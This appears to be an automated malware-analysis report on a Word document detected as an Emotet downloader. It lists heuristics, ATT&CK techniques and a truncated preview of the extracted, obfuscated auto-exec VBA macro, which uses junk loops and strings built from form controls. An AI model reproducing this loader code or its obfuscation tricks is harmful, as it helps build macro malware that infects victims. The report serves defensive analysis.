MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1071.001 Web Protocols
The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6969373-0', indicating it is likely part of the Emotet family. Critical heuristics indicate an obfuscated auto-exec VBA loader that uses GetObject for execution, suggesting it's designed to download and run a secondary payload. The presence of legacy WordBasic auto-exec markers and VBA macros further supports this.
Heuristics 8
-
ClamAV: Doc.Downloader.Emotet-6969373-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6969373-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8185 bytes |
SHA-256: 84a318b69bf57f2170a9736dfadaa2bf8ef07823791c59595077dcb7fbcb5f42 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "T7544_"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "p3883_5"
Attribute VB_Base = "0{48CCBC35-A633-42BB-8F2F-19BA4241251B}{80AE38D2-94A1-4DCD-AEEA-F844ABDAD7DA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "D_23_909"
Attribute VB_Name = "A70721"
Attribute VB_Name = "p91_00"
Attribute VB_Name = "n55686"
Attribute VB_Name = "s043837"
Attribute VB_Name = "q3381_2"
Attribute VB_Base = "0{E9D8652C-019A-4744-B4BB-F572AC8763FF}{38E1CABB-4C12-4BC1-B32E-4A73AE494D20}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "W7_80077"
Function P32_41(k34_7_7)
While c3143_4 And v08974
Close ("X521570")
Close ("h_7_760")
Close ("716998480")
Close ("333246014")
Wend
While G85_5079 And Y00150
Close ("v799545_")
Close ("w9325049")
Close ("789847143")
Close ("447900592")
Wend
While K46848 And N986_9
Close ("W9548314")
Close ("j401_4")
Close ("202799383")
Close ("162131451")
Wend
Set P32_41 = CVar(k34_7_7)
While o47763 And k99_54
Close ("W8_62112")
Close ("r_041901")
Close ("465234597")
Close ("33737622")
Wend
While C3064_ And c31892
Close ("N7_40_2")
Close ("D4085925")
Close ("430944436")
Close ("892798185")
Wend
While j456_608 And T664_00
Close ("H561337")
Close ("C52_218")
Close ("838628702")
Close ("627710716")
Wend
End Function
Sub _
autoopen()
On Error Resume Next
While U5_7888 And j670846
Close ("j45927")
Close ("B4653399")
Close ("796063649")
Close ("59523629")
Wend
While F__531 And N60__147
Close ("W7289890")
Close ("w37974")
Close ("134206871")
Close ("678297840")
Wend
While q9577232 And q2479484
Close ("k523492")
Close ("i523_0")
Close ("55798511")
Close ("371304095")
Wend
Call o73012
While i3_73_0 And s59714
Close ("P_088270")
Close ("t0_936")
Close ("606837940")
Close ("627295910")
Wend
While p80489 And b007_57
Close ("b5_95524")
Close ("r_49642")
Close ("955259392")
Close ("578874310")
Wend
End Sub
Attribute VB_Name = "q94982"
Function o73012()
On Error Resume Next
While q15351 And m354724
Close ("G27237_2")
Close ("M303573")
Close ("889412469")
Close ("190355619")
Wend
While M5882906 And o_136_
Close ("z04451")
Close ("O6_2307")
Close ("53621047")
Close ("934686248")
Wend
O_0426 = p3883_5.f0423943.Tag + q3381_2.I60_9151 + p3883_5.f0423943.Text + q3381_2.J331_05 + p3883_5.f0423943.Value + p3883_5.f0423943 + q3381_2.P854047_ + p3883_5.f0423943.Text + p3883_5.f0423943 + q3381_2.Z_84__ + p3883_5.f0423943.Text + q3381_2.h749931.ControlTipText + p3883_5.f0423943
While c67912 And h8364623
Close ("t0_81525")
Close ("z292131")
Close ("919509130")
Close ("468073194")
Wend
While C922983 And p3_1363
Close ("D__5315")
Close ("B2_5222")
Close ("575845255")
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.